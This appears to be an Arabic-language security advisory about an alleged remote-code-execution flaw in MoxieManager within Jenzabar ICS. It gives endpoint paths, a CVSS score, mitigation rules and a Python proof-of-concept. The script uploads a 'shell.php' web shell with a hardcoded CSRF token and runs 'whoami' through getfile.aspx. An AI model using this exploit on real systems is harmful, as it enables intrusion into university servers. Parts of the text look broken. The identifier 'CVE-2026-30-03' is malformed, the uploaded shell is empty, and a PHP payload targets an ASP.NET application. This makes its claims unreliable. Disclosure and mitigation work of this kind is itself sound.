
CVE-2026-30-03 9.8 (حرج) ثغرة RCE محتملة في Jenzabar ICS + MoxieManager
CVE-2026-30-03 9.8 (حرج) إمكانية RCE في Jenzabar ICS + MoxieManager
proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be
CVE CVSS التأثير المتأثر CVE-2026-30-03 9.8 (حرج) إمكانية RCE Jenzabar ICS + MoxieManager
ثغرة أمنية في مكوّن MoxieManager المستخدم في نظام Jenzabar ICS قد تسمح برفع ملفات بشكل غير لائق، والتي، في ظل ظروف معينة، يمكن الوصول إليها علنًا وقد تؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE). الوصف الفني
تحدث المشكلة بسبب:
عدم وجود تحقق مناسب من الملفات المرفوعة
احتمال تعرض الملفات عبر نقطة نهاية عامة:
/ICS/staticpages/getfile.aspx
تحكم غير متناسق في المصادقة على نقطة النهاية:
/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx
في سيناريوهات محددة، قد يتم تخزين الملفات المرفوعة في أدلة يمكن الوصول إليها واسترجاعها لاحقًا.
التأثير رفع ملفات تعسفي تعرض محتوى حساس احتمال تنفيذ التعليمات البرمجية عن بُعد (اعتمادًا على تكوين الخادم) اختراق كامل للنظام
التصنيف CVSS v3.1: 9.8 (حرج) المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE-434: رفع ملف بدون قيود CWE-284: تحكم غير مناسب في الوصول
PoC Exploit
#!/usr/bin/env python3
import requests
TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"
files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}
r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")
SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)
الأنظمة المتأثرة (33+ مؤكد)
المعالجة فورية (تخفيف):
DELETE /moxiemanager/files/users/*/shell.php
تقييد getfile.aspx:
RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]
تعطيل رفع الملفات في MoxieManager